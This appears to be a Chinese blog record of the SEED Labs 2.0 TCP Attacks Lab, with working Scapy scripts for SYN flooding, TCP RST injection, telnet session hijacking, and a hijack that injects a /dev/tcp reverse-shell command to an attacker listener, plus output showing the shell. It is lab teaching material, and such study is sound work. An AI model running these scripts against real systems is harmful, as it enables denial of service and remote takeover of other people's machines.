【SEED Labs 2.0】TCP Attacks Lab
本文为 SEED Labs 2.0 - TCP Attacks Lab 的实验记录。
文章目录
- 实验原理
- Task 1: SYN Flooding Attack
- Task 1.1: Launching the Attack Using Python
- Task 1.2: Launch the Attack Using C
- Task 1.3: Enable the SYN Cookie Countermeasure
- Task 2: TCP RST Attacks on telnet Connections
- Task 3: TCP Session Hijacking
- Task 4: Creating Reverse Shell using TCP Session Hijacking
- 实验总结
实验原理
TCP/IP 协议中的漏洞代表了协议设计和实现中一种特殊类型的漏洞;它们提供了宝贵的教训,说明为什么应该从一开始就设计安全性,而不是事后才添加。此外,研究这些漏洞有助于我们了解网络安全的挑战以及为什么需要许多网络安全措施。在本实验中,我们将对 TCP 进行多次攻击。本实验涵盖以下主题:
- TCP 协议
- TCP SYN 泛洪攻击和 SYN cookie
- TCP 重置攻击
- TCP 会话劫持攻击
- shell 反弹
Task 1: SYN Flooding Attack
为方便观察,我们修改名称:
# export PS1="\w victim-10.9.0.5$ "
# export PS1="\w attacker-10.9.0.1$ "
# export PS1="\w user1-10.9.0.6$ "
修改 dockerfile,给 victim 加上:
privileged: true
Task 1.1: Launching the Attack Using Python
编写 synflood.py
:
#!/bin/env python3from scapy.all import IP, TCP, send
from ipaddress import IPv4Address
from random import getrandbitsip = IP(dst="10.9.0.5")
tcp = TCP(dport=23, flags='S')
pkt = ip/tcpwhile True:pkt[IP].src = str(IPv4Address(getrandbits(32))) # source iPpkt[TCP].sport = getrandbits(16) # source portpkt[TCP].seq = getrandbits(32) # sequence numbersend(pkt, verbose = 0)
查看当前 tcp 连接:
victim-10.9.0.5$ netstat -nat
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.11:41019 0.0.0.0:* LISTEN
运行程序:
attacker-10.9.0.1$ synflood.py
查看当前 tcp 连接:
victim-10.9.0.5$ netstat -nat
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.11:41019 0.0.0.0:* LISTEN
tcp 0 0 10.9.0.5:23 51.28.29.181:52204 SYN_RECV
tcp 0 0 10.9.0.5:23 144.159.54.170:59931 SYN_RECV
tcp 0 0 10.9.0.5:23 187.91.156.41:61074 SYN_RECV
......
victim-10.9.0.5$ netstat -tna | grep SYN_RECV | wc -l
97
victim-10.9.0.5$ ss -n state syn-recv sport = :23 | wc -l
98
我们 telnet 10.9.0.5
:
user1-10.9.0.6$ telnet 10.9.0.5
Trying 10.9.0.5...
Connected to 10.9.0.5.
Escape character is '^]'.
Ubuntu 20.04.1 LTS
791656960e97 login: seed
Password:
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-54-generic x86_64)* Documentation: https://help.ubuntu.com* Management: https://landscape.canonical.com* Support: https://ubuntu.com/advantageThis system has been minimized by removing packages and content that are
not required on a system that users do not log into.To restore this content, you can run the 'unminimize' command.
Last login: Mon Aug 29 06:36:20 UTC 2022 from user1-10.9.0.6.net-10.9.0.0 on pts/2
只稍微等了一下下,就连接上了。而我们之后再次连接,都是瞬间连接上。
第一次是因为,python 程序跑得不够快,其它用户总有机会抢过它。而之后能立即连接是因为,受害者主机记住了原来的连接。
Task 1.2: Launch the Attack Using C
我们首先清空一下:
victim-10.9.0.5$ ip tcp_metrics flush
在宿主机编译:
$ gcc -o synflood synflood.c
$ chmod a+x synflood
然后运行:
attacker-10.9.0.1$ synflood 10.9.0.5 23
查看当前 tcp 连接:
victim-10.9.0.5$ netstat -nat
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.11:41019 0.0.0.0:* LISTEN
tcp 0 0 10.9.0.5:23 111.55.219.82:27483 SYN_RECV
tcp 0 0 10.9.0.5:23 249.195.34.103:34881 SYN_RECV
tcp 0 0 10.9.0.5:23 148.11.56.119:17200 SYN_RECV
......
victim-10.9.0.5$ netstat -tna | grep SYN_RECV | wc -l
97
victim-10.9.0.5$ ss -n state syn-recv sport = :23 | wc -l
98
telnet 10.9.0.5
:
user1-10.9.0.6$ telnet 10.9.0.5
Trying 10.9.0.5...
可以看到,卡在这里不动了。
Task 1.3: Enable the SYN Cookie Countermeasure
我们首先清空一下:
victim-10.9.0.5$ ip tcp_metrics flush
启动 syncookies:
victim-10.9.0.5$ sysctl -w net.ipv4.tcp_syncookies=1
net.ipv4.tcp_syncookies = 1
启动程序:
attacker-10.9.0.1$ synflood 10.9.0.5 23
查看当前 tcp 连接:
victim-10.9.0.5$ netstat -nat
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 127.0.0.11:34637 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN
tcp 0 0 10.9.0.5:23 55.22.243.45:18447 SYN_RECV
tcp 0 0 10.9.0.5:23 118.13.9.120:28741 SYN_RECV
tcp 0 0 10.9.0.5:23 32.34.55.0:57543 SYN_RECV
......
victim-10.9.0.5$ netstat -tna | grep SYN_RECV | wc -l
128
victim-10.9.0.5$ ss -n state syn-recv sport = :23 | wc -l
129
telnet 10.9.0.5
:
user1-10.9.0.6$ telnet 10.9.0.5
Trying 10.9.0.5...
Connected to 10.9.0.5.
Escape character is '^]'.
Ubuntu 20.04.1 LTS
22c45e0a11e6 login: seed
Password:
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-54-generic x86_64)* Documentation: https://help.ubuntu.com* Management: https://landscape.canonical.com* Support: https://ubuntu.com/advantageThis system has been minimized by removing packages and content that are
not required on a system that users do not log into.To restore this content, you can run the 'unminimize' command.The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
可以看到,尽管队列已经满了,但还是能正常连接。
Task 2: TCP RST Attacks on telnet Connections
在宿主机中查看网桥名称:
$ ifconfig
br-88413f1d34bf: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500inet 10.9.0.1 netmask 255.255.255.0 broadcast 10.9.0.255inet6 fe80::42:65ff:fef4:634e prefixlen 64 scopeid 0x20<link>ether 02:42:65:f4:63:4e txqueuelen 0 (Ethernet)RX packets 4395661 bytes 193408492 (193.4 MB)RX errors 0 dropped 0 overruns 0 frame 0TX packets 4821393 bytes 260362284 (260.3 MB)TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
编写 tcprst.py
:
#!/usr/bin/env python3
from scapy.all import *def spoof_pkt(pkt):ip = IP(src=pkt[IP].src, dst=pkt[IP].dst)tcp = TCP(sport=23, dport=pkt[TCP].dport, flags="R", seq=pkt[TCP].seq+1)pkt = ip/tcpls(pkt)send(pkt, verbose=0)f = f'tcp and src host 10.9.0.5'
pkt = sniff(iface='br-88413f1d34bf', filter=f, prn=spoof_pkt)
运行程序:
attacker-10.9.0.1$ tcprst.py
telnet 10.9.0.5
:
user1-10.9.0.6$ telnet 10.9.0.5
Trying 10.9.0.5...
Connected to 10.9.0.5.
Escape character is '^]'.
Ubuntu 20.04.1 LTS
22c45e0a11e6 login: sConnection closed by foreign host.
可以看出,连接直接被中断了。
Task 3: TCP Session Hijacking
编写 tcphijacking.py
:
#!/usr/bin/env python3
from scapy.all import *def spoof_pkt(pkt):ip = IP(src=pkt[IP].dst, dst=pkt[IP].src)tcp = TCP(sport=pkt[TCP].dport, dport=23,flags="A",seq=pkt[TCP].ack, ack=pkt[TCP].seq+1)data = "echo \"Fk U bitch!\" >> ~/hijacking.out\n\0"pkt = ip/tcp/datals(pkt)send(pkt, verbose=0)f = f'tcp and src host 10.9.0.5'
pkt = sniff(iface='br-88413f1d34bf', filter=f, prn=spoof_pkt)
telnet 10.9.0.5
:
user1-10.9.0.6$ telnet 10.9.0.5
Trying 10.9.0.5...
Connected to 10.9.0.5.
Escape character is '^]'.
Ubuntu 20.04.1 LTS
22c45e0a11e6 login: seed
Password:
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-54-generic x86_64)* Documentation: https://help.ubuntu.com* Management: https://landscape.canonical.com* Support: https://ubuntu.com/advantageThis system has been minimized by removing packages and content that are
not required on a system that users do not log into.To restore this content, you can run the 'unminimize' command.
Last login: Mon Aug 29 10:20:40 UTC 2022 from user1-10.9.0.6.net-10.9.0.0 on pts/2
运行程序:
attacker-10.9.0.1$ tcphijacking.py
查看攻击效果:
victim-10.9.0.5$ cat /home/seed/hijacking.out
Fk U bitch!
可以看出,程序成功写入了一个文件。
Task 4: Creating Reverse Shell using TCP Session Hijacking
编写 reverseshell.py
:
#!/usr/bin/env python3
from scapy.all import *def spoof_pkt(pkt):ip = IP(src=pkt[IP].dst, dst=pkt[IP].src)tcp = TCP(sport=pkt[TCP].dport, dport=23, flags="A", seq=pkt[TCP].ack, ack=pkt[TCP].seq+1)data = "/bin/bash -i > /dev/tcp/10.9.0.1/9090 0<&1 2>&1\n\0"pkt = ip/tcp/datasend(pkt, verbose=0)f = f'tcp and src host 10.9.0.5'
pkt = sniff(iface='br-88413f1d34bf', filter=f, prn=spoof_pkt)
在 attacker 上开启监听:
attacker-10.9.0.1$ nc -lnv 9090
Listening on 0.0.0.0 9090
telnet 10.9.0.5
:
user1-10.9.0.6$ telnet 10.9.0.5
Trying 10.9.0.5...
Connected to 10.9.0.5.
Escape character is '^]'.
Ubuntu 20.04.1 LTS
22c45e0a11e6 login: seed
Password:
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-54-generic x86_64)* Documentation: https://help.ubuntu.com* Management: https://landscape.canonical.com* Support: https://ubuntu.com/advantageThis system has been minimized by removing packages and content that are
not required on a system that users do not log into.To restore this content, you can run the 'unminimize' command.
Last login: Mon Aug 29 10:54:18 UTC 2022 from user1-10.9.0.6.net-10.9.0.0 on pts/3
运行程序:
attacker-10.9.0.1$ reverseshell.py
可以看到,成功拿到 victim 的 shell:
attacker-10.9.0.1$ nc -lnv 9090
Listening on 0.0.0.0 9090
Connection received on 10.9.0.5 42462
seed@22c45e0a11e6:~$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00inet 127.0.0.1/8 scope host lovalid_lft forever preferred_lft forever
70: eth0@if71: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default link/ether 02:42:0a:09:00:05 brd ff:ff:ff:ff:ff:ff link-netnsid 0inet 10.9.0.5/24 brd 10.9.0.255 scope global eth0valid_lft forever preferred_lft forever
实验总结
本实验需要分清到底劫持的哪个报文,剩下的工作就很简单了。
【SEED Labs 2.0】TCP Attacks Lab相关推荐
- 【SEED Labs 2.0】V*N Tunneling Lab
本文为 SEED Labs 2.0 - V*N Tunneling Lab 的实验记录. 文章目录 实验原理 Task 1: Network Setup Task 2: Create and Conf ...
- 【SEED Labs 2.0】Buffer-Overflow Attack
本文为 SEED Labs 2.0 - Buffer-Overflow Attack Lab (Server Version) 的实验记录. 实验原理 Task1: Get Familiar with ...
- 【SEED Labs 2.0】Packet Sniffing and Spoofing Lab
本文为 SEED Labs 2.0 - Packet Sniffing and Spoofing Lab 的实验记录. 文章目录 实验原理 Lab Task Set 1: Using Scapy to ...
- 【SEED Labs 2.0】ARP Cache Poisoning Attack Lab
本文为 SEED Labs 2.0 - ARP Cache Poisoning Attack Lab 的实验记录. 文章目录 实验原理 Task 1: ARP Cache Poisoning Task ...
- 【SEED Labs 2.0】Virtual Private Network (V*N) Lab
本文为 SEED Labs 2.0 - Virtual Private Network (V*N) Lab 的实验记录. 文章目录 0. 实验目标 1. 生成证书 2. 设置 Docker 3. 编写 ...
- 【SEED Labs 2.0】Cross-Site Request Forgery Attack
本文为 SEED Labs 2.0 - Cross-Site Request Forgery Attack Lab 的实验记录. 实验原理 在客户机和服务器之间进行请求-响应时,两种最常被用到的方法是 ...
- 【零基础学Java】—TCP通信(五十四)
[零基础学Java]-TCP通信(五十四) TCP通信:面向连接的通信,客户端和服务器端必须经过三次握手,建立逻辑连接,才能通信(安全). 通信的步骤: 服务器端先启动 服务器端不会主动的请求客户端, ...
- 【接箱子2.0】新手划过,dalao勿喷
[接箱子2.0]新手划过,dalao勿喷 哈喽,本喵这个萌新又回来啦!(^_^) 这次前前后后优化了好多次代码,终于- 我的代码突破80行啦! 开心 ------------------------- ...
- 扩散模型Diffusion Model 【质量提升2.0】【扩散模型】
扩散模型Diffusion Model [质量提升2.0][扩散模型] 文章目录 扩散模型Diffusion Model [质量提升2.0][扩散模型] 一.扩散模型简介 二.前向扩散简介 三.逆向扩 ...
- 【VMware vSAN 7.0】5.5 配置 vSAN 集群的许可证设置
[VMware vSAN 7.0]5.5 配置 vSAN 集群的许可证设置-我们有软硬件解决方案 IT干货 2021-03-31 16:36:53 213 收藏 1 分类专栏: 1.服务器虚拟化集群方 ...
最新文章
- 线性矩阵不等式LMI的运用与Lipschitz非线性系统观测器的设计
- 基于图像到UV Map映射的3D手部高保真重建网络(ICCV2021)
- 190. Reverse Bits
- 推荐几个华为、字节跳动、蚂蚁金服的大佬公号
- coherence安装_在Oracle Coherence中分发Spring Bean
- 六种常用的物联网通信协议
- python脚本调用外部程序的若干种方式以及利弊
- 智能安全实验室-Defendio杀马2.4.0.420-实时防护-内存防护、新浏览器导航界面...
- android shareUID
- 设置虚拟机上的redis可以被windows的环境下的python访问连接
- Easy-mock让团队协作效率提高不止一点点
- SpringBoot启动错误 If you want an embedded database (H2, HSQL or Derby), please put it on the classpath.
- Atitit 调用另外语言的功能 目录 1. Waht 常见的语言java python js sql xml h5 c# php等之间的互相调用	1 2. 为什么需要互相调用why	1 3. 常
- 程序员也要学英语——词根词缀大全(陆续更新)
- 从物联网到元宇宙 PPT
- 《C》C语言实现DCT算法
- html+css制作月亮
- android 虚拟按键遮挡布局,完美解决虚拟按键遮盖底部视图的问题
- 关于正向级数收敛而它的平方也收敛的证明
- 国庆、中秋双节同庆 青岛浮山湾灯光秀启动节日模式